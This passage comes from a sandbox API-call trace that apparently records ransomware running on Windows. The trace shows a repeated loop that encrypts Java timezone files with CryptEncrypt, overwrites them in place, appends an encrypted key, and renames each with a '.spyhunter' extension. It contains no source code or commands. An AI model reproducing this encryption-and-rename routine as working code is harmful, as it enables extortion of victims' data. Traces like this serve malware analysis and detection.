(x86)\\Java\\jre7\\lib\\zi\\Asia\\Pyongyang.spyhunter") returned 68 [0169.308] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pyongyang" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\pyongyang"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pyongyang.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\pyongyang.spyhunter")) returned 1 [0169.309] GetProcessHeap () returned 0x2c0000 [0169.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.309] GetProcessHeap () returned 0x2c0000 [0169.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.309] GetProcessHeap () returned 0x2c0000 [0169.309] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebcd40 | out: hHeap=0x2c0000) returned 1 [0169.309] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5b0 | out: pbBuffer=0x248e5b0) returned 1 [0169.309] GetProcessHeap () returned 0x2c0000 [0169.309] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.309] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5a8*=0x30) returned 1 [0169.309] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pontianak" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\pontianak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.310] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pontianak") returned 58 [0169.310] StrStrW (lpFirst="Pontianak", lpSrch=".txt") returned 0x0 [0169.310] GetProcessHeap () returned 0x2c0000 [0169.310] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.310] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e56c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e56c*=0x7d, lpOverlapped=0x0) returned 1 [0169.311] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff83, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.311] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x7d, lpNumberOfBytesWritten=0x248e56c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e56c*=0x7d, lpOverlapped=0x0) returned 1 [0169.311] GetProcessHeap () returned 0x2c0000 [0169.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.311] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.311] WriteFile (in: hFile=0x9c, lpBuffer=0x248e5ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e56c, lpOverlapped=0x0 | out: lpBuffer=0x248e5ac*, lpNumberOfBytesWritten=0x248e56c*=0x4, lpOverlapped=0x0) returned 1 [0169.311] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e56c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e56c*=0x30, lpOverlapped=0x0) returned 1 [0169.311] CloseHandle (hObject=0x9c) returned 1 [0169.312] GetProcessHeap () returned 0x2c0000 [0169.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.312] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pontianak.spyhunter") returned 68 [0169.312] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pontianak" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\pontianak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pontianak.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\pontianak.spyhunter")) returned 1 [0169.312] GetProcessHeap () returned 0x2c0000 [0169.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.312] GetProcessHeap () returned 0x2c0000 [0169.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.312] GetProcessHeap () returned 0x2c0000 [0169.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebcc80 | out: hHeap=0x2c0000) returned 1 [0169.313] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5a8 | out: pbBuffer=0x248e5a8) returned 1 [0169.313] GetProcessHeap () returned 0x2c0000 [0169.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.313] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5a0*=0x30) returned 1 [0169.313] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Phnom_Penh" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\phnom_penh"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.313] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Phnom_Penh") returned 59 [0169.313] StrStrW (lpFirst="Phnom_Penh", lpSrch=".txt") returned 0x0 [0169.313] GetProcessHeap () returned 0x2c0000 [0169.313] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.313] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e564, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e564*=0x61, lpOverlapped=0x0) returned 1 [0169.314] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff9f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.314] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x61, lpNumberOfBytesWritten=0x248e564, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e564*=0x61, lpOverlapped=0x0) returned 1 [0169.314] GetProcessHeap () returned 0x2c0000 [0169.314] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.314] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.314] WriteFile (in: hFile=0x9c, lpBuffer=0x248e5a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e564, lpOverlapped=0x0 | out: lpBuffer=0x248e5a4*, lpNumberOfBytesWritten=0x248e564*=0x4, lpOverlapped=0x0) returned 1 [0169.314] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e564, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e564*=0x30, lpOverlapped=0x0) returned 1 [0169.315] CloseHandle (hObject=0x9c) returned 1 [0169.315] GetProcessHeap () returned 0x2c0000 [0169.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.315] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Phnom_Penh.spyhunter") returned 69 [0169.315] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Phnom_Penh" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\phnom_penh"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Phnom_Penh.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\phnom_penh.spyhunter")) returned 1 [0169.315] GetProcessHeap () returned 0x2c0000 [0169.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.315] GetProcessHeap () returned 0x2c0000 [0169.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.315] GetProcessHeap () returned 0x2c0000 [0169.315] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebcbc0 | out: hHeap=0x2c0000) returned 1 [0169.316] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5a8 | out: pbBuffer=0x248e5a8) returned 1 [0169.316] GetProcessHeap () returned 0x2c0000 [0169.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.316] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e5a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e5a0*=0x30) returned 1 [0169.316] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Oral" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\oral"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.316] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Oral") returned 53 [0169.316] StrStrW (lpFirst="Oral", lpSrch=".txt") returned 0x0 [0169.316] GetProcessHeap () returned 0x2c0000 [0169.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.316] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e564, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e564*=0x1cd, lpOverlapped=0x0) returned 1 [0169.317] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffe33, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.317] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1cd, lpNumberOfBytesWritten=0x248e564, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e564*=0x1cd, lpOverlapped=0x0) returned 1 [0169.317] GetProcessHeap () returned 0x2c0000 [0169.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.317] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.317] WriteFile (in: hFile=0x9c, lpBuffer=0x248e5a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e564, lpOverlapped=0x0 | out: lpBuffer=0x248e5a4*, lpNumberOfBytesWritten=0x248e564*=0x4, lpOverlapped=0x0) returned 1 [0169.317] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e564, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e564*=0x30, lpOverlapped=0x0) returned 1 [0169.318] CloseHandle (hObject=0x9c) returned 1 [0169.318] GetProcessHeap () returned 0x2c0000 [0169.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0169.318] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Oral.spyhunter") returned 63 [0169.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Oral" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\oral"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Oral.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\oral.spyhunter")) returned 1 [0169.318] GetProcessHeap () returned 0x2c0000 [0169.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0169.318] GetProcessHeap () returned 0x2c0000 [0169.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.318] GetProcessHeap () returned 0x2c0000 [0169.318] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f277c0 | out: hHeap=0x2c0000) returned 1 [0169.319] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5a0 | out: pbBuffer=0x248e5a0) returned 1 [0169.319] GetProcessHeap () returned 0x2c0000 [0169.319] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.319] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e598*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e598*=0x30) returned 1 [0169.319] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Omsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\omsk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.383] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Omsk") returned 53 [0169.383] StrStrW (lpFirst="Omsk", lpSrch=".txt") returned 0x0 [0169.383] GetProcessHeap () returned 0x2c0000 [0169.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.383] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e55c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e55c*=0x245, lpOverlapped=0x0) returned 1 [0169.384] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffdbb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.384] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x245, lpNumberOfBytesWritten=0x248e55c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e55c*=0x245, lpOverlapped=0x0) returned 1 [0169.384] GetProcessHeap () returned 0x2c0000 [0169.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.384] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.384] WriteFile (in: hFile=0x9c, lpBuffer=0x248e59c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e55c, lpOverlapped=0x0 | out: lpBuffer=0x248e59c*, lpNumberOfBytesWritten=0x248e55c*=0x4, lpOverlapped=0x0) returned 1 [0169.384] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e55c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e55c*=0x30, lpOverlapped=0x0) returned 1 [0169.385] CloseHandle (hObject=0x9c) returned 1 [0169.385] GetProcessHeap () returned 0x2c0000 [0169.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.385] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Omsk.spyhunter") returned 63 [0169.385] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Omsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\omsk"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Omsk.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\omsk.spyhunter")) returned 1 [0169.386] GetProcessHeap () returned 0x2c0000 [0169.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.386] GetProcessHeap () returned 0x2c0000 [0169.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.386] GetProcessHeap () returned 0x2c0000 [0169.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f27708 | out: hHeap=0x2c0000) returned 1 [0169.386] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e5a0 | out: pbBuffer=0x248e5a0) returned 1 [0169.386] GetProcessHeap () returned 0x2c0000 [0169.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.386] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e598*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e598*=0x30) returned 1 [0169.387] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Macau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\macau"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.387] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Macau") returned 54 [0169.387] StrStrW (lpFirst="Macau", lpSrch=".txt") returned 0x0 [0169.387] GetProcessHeap () returned 0x2c0000 [0169.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.388] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e55c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e55c*=0x189, lpOverlapped=0x0) returned 1 [0169.388] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffe77, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.388] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x189, lpNumberOfBytesWritten=0x248e55c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e55c*=0x189, lpOverlapped=0x0) returned 1 [0169.388] GetProcessHeap () returned 0x2c0000 [0169.388] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.389] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.389] WriteFile (in: hFile=0x9c, lpBuffer=0x248e59c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e55c, lpOverlapped=0x0 | out: lpBuffer=0x248e59c*, lpNumberOfBytesWritten=0x248e55c*=0x4, lpOverlapped=0x0) returned 1 [0169.389] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e55c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e55c*=0x30, lpOverlapped=0x0) returned 1 [0169.389] CloseHandle (hObject=0x9c) returned 1 [0169.389] GetProcessHeap () returned 0x2c0000 [0169.389] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.389] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Macau.spyhunter") returned 64 [0169.389] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Macau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\macau"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Macau.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\macau.spyhunter")) returned 1 [0169.390] GetProcessHeap () returned 0x2c0000 [0169.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.390] GetProcessHeap () returned 0x2c0000 [0169.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.390] GetProcessHeap () returned 0x2c0000 [0169.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f274e0 | out: hHeap=0x2c0000) returned 1 [0169.390] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e598 | out: pbBuffer=0x248e598) returned 1 [0169.390] GetProcessHeap () returned 0x2c0000 [0169.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.390] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e590*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e590*=0x30) returned 1 [0169.390] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuwait" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuwait"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.391] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuwait") returned 55 [0169.391] StrStrW (lpFirst="Kuwait", lpSrch=".txt") returned 0x0 [0169.391] GetProcessHeap () returned 0x2c0000 [0169.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0169.391] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e554, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e554*=0x41, lpOverlapped=0x0) returned 1 [0169.392] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.392] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x248e554, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e554*=0x41, lpOverlapped=0x0) returned 1 [0169.392] GetProcessHeap () returned 0x2c0000 [0169.392] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0169.392] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.392] WriteFile (in: hFile=0x9c, lpBuffer=0x248e594*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e554, lpOverlapped=0x0 | out: lpBuffer=0x248e594*, lpNumberOfBytesWritten=0x248e554*=0x4, lpOverlapped=0x0) returned 1 [0169.392] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e554, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e554*=0x30, lpOverlapped=0x0) returned 1 [0169.392] CloseHandle (hObject=0x9c) returned 1 [0169.392] GetProcessHeap () returned 0x2c0000 [0169.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0169.392] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuwait.spyhunter") returned 65 [0169.393] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuwait" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuwait"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuwait.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuwait.spyhunter")) returned 1 [0169.393] GetProcessHeap () returned 0x2c0000 [0169.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0169.393] GetProcessHeap () returned 0x2c0000 [0169.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0169.393] GetProcessHeap () returned 0x2c0000 [0169.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f27428 | out: hHeap=0x2c0000) returned 1 [0169.393] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e598 | out: pbBuffer=0x248e598) returned 1 [0169.393] GetProcessHeap () returned 0x2c0000 [0169.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0169.393] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e590*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e590*=0x30) returned 1 [0169.394] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuching" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\kuching"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0169.394] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Kuching") returned 56 [0169.394] StrStrW (lpFirst="Kuching", lpSrch=".txt") returned 